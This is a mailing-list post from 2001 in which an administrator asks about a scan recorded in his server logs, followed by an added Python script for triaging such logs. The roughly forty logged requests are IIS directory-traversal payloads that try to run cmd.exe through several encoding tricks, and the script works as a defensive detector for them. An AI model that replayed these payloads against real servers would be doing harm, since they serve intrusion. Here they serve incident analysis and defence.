Security Incidents mailing list archives

New IIS exploit tool? Has anyone seen this pattern before?


From: Thomas Haeberlen <Haeberlen () RUS Uni-Stuttgart DE>
Date: Tue, 30 Oct 2001 12:47:00 +0100

Hello everybody,

has anyone seen this pattern of IIS attacks before? Could this be a new
exploit tool or something like "nimda2"? On the other hand it seems that 
it is only trying the long known holes...

------------------------------- snip ----------------------------------

195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 244 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 246 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 242 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:42 +0100] "GET /PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 235 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:43 +0100] "GET /_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 253 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 254 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 403 258 "-" "-"
195.13.121.101 - - [30/Oct/2001:11:43:44 +0100] "GET /iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 256 "-" "-"
------------------------------------ snap --------------------------------

Timestamps are GMT+1. Any hints?

Regards,

Thomas Haeberlen

-- 
Thomas Haeberlen
Rechenzentrum Universitaet Stuttgart (RUS)              
Abteilung Informationsdienste  
Allmandring 30 , D-70569 Stuttgart
Email: haeberlen () rus uni-stuttgart de
Phone: +49 711 685 47 19 Fax: +49 711 678 76 26

----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
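Added example, not part of the original post: a small triage script for log excerpts like the one above. It parses combined-format lines, canonicalises the request path the way the targeted decoders did (repeated percent-decoding so that %255c, %25%35%63 and %%35c all collapse to a backslash, plus masking of the overlong two-byte UTF-8 sequences %C0%AF, %C1%9C and %C1%1C into "/" and "\"), and then flags any request that resolves to a traversal or a command-shell name. The lenient decoder, the technique labels and the sample input are my assumptions for illustration; five sample lines are copied from the post, two (the benign request and the 200-status request from 192.0.2.77) are constructed. The point for a defender is the last field: every line in the post is a 4xx, so the host was not hit, whereas a 2xx on the same request is what to escalate.

```python
import re
from collections import Counter

# Apache/NCSA combined log format, matching the records quoted in the post.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
PERCENT_RE = re.compile(rb'%([0-9A-Fa-f]{2})')
TRAVERSAL_RE = re.compile(r'\.\.[\\/]')
SHELL_NAMES = ('cmd.exe', 'root.exe')   # names the posted scan asks for


def lenient_utf8(data: bytes) -> str:
    """Model (assumption) of a lenient decoder: an overlong two-byte sequence
    with lead byte 0xC0/0xC1 is masked into a code point instead of rejected,
    so %C0%AF -> '/', and %C1%9C or %C1%1C -> '\\'. Other bytes are taken as
    Latin-1 so nothing is dropped from the path."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if b in (0xC0, 0xC1) and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return ''.join(out)


def normalize(target: str, max_rounds: int = 3):
    """Percent-decode repeatedly (%255c -> %5c -> '\\'; the split spellings
    %25%35%63 and %%35c collapse the same way), then apply the lenient UTF-8
    step. Returns (decoded, decode_rounds, overlong_seen)."""
    raw = target.encode('latin-1', 'replace')
    rounds = 0
    while rounds < max_rounds and PERCENT_RE.search(raw):
        raw = PERCENT_RE.sub(lambda m: bytes([int(m.group(1), 16)]), raw)
        rounds += 1
    overlong = any(b in (0xC0, 0xC1) for b in raw)
    return lenient_utf8(raw), rounds, overlong


def analyze(line: str):
    """Return a finding for a traversal/command-shell request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    target = m.group('target')
    decoded, rounds, overlong = normalize(target)
    decoded_path = decoded.split('?', 1)[0]
    if not (TRAVERSAL_RE.search(decoded_path)
            or any(n in decoded_path.lower() for n in SHELL_NAMES)):
        return None
    if overlong:
        technique = 'overlong-utf8'
    elif rounds >= 2:
        technique = 'double-encoding'
    elif rounds == 1:
        technique = 'single-encoding'
    else:
        technique = 'plain'
    parts = target.split('/')
    status = int(m.group('status'))
    return {
        'ip': m.group('ip'),
        'prefix': parts[1].lower() if len(parts) > 1 else '',
        'technique': technique,
        'decoded': decoded_path,
        'status': status,
        # 4xx means the server refused; a 2xx means it ran the request.
        'succeeded': 200 <= status < 300,
    }


def summarize(lines):
    findings = [f for f in (analyze(l) for l in lines) if f]
    return {
        'findings': findings,
        'per_source': Counter(f['ip'] for f in findings),
        'per_prefix': Counter(f['prefix'] for f in findings),
        'techniques': Counter(f['technique'] for f in findings),
        'successes': [f for f in findings if f['succeeded']],
    }


# Sample input: five lines copied from the post, two constructed (the
# /index.html request and the 200-status line from 192.0.2.77).
SAMPLE_LINES = [
    r'195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/root.exe?/c+dir+C:\ HTTP/1.0" 404 210 "-" "-"',
    r'195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 234 "-" "-"',
    r'195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"',
    r'195.13.121.101 - - [30/Oct/2001:11:43:40 +0100] "GET /scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 404 240 "-" "-"',
    r'195.13.121.101 - - [30/Oct/2001:11:43:41 +0100] "GET /msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 400 215 "-" "-"',
    r'10.0.0.5 - - [30/Oct/2001:11:50:00 +0100] "GET /index.html HTTP/1.0" 200 1234 "-" "Mozilla/4.0"',
    r'192.0.2.77 - - [30/Oct/2001:11:51:00 +0100] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir+C:\ HTTP/1.0" 200 1503 "-" "-"',
]

if __name__ == '__main__':
    report = summarize(SAMPLE_LINES)
    for f in report['findings']:
        print(f"{f['ip']:15} {f['status']} {f['technique']:16} {f['decoded']}")
    print('per source:', dict(report['per_source']))
    print('techniques:', dict(report['techniques']))
    print('successful:', [(f['ip'], f['decoded']) for f in report['successes']])
```

Run it against a real access log with `summarize(open('access_log').read().splitlines())`; the `per_prefix` counter reproduces the directory walk seen in the post (/scripts, /msadc, /_vti_bin, ...), and the `successes` list is empty for the posted excerpt because every request there was refused.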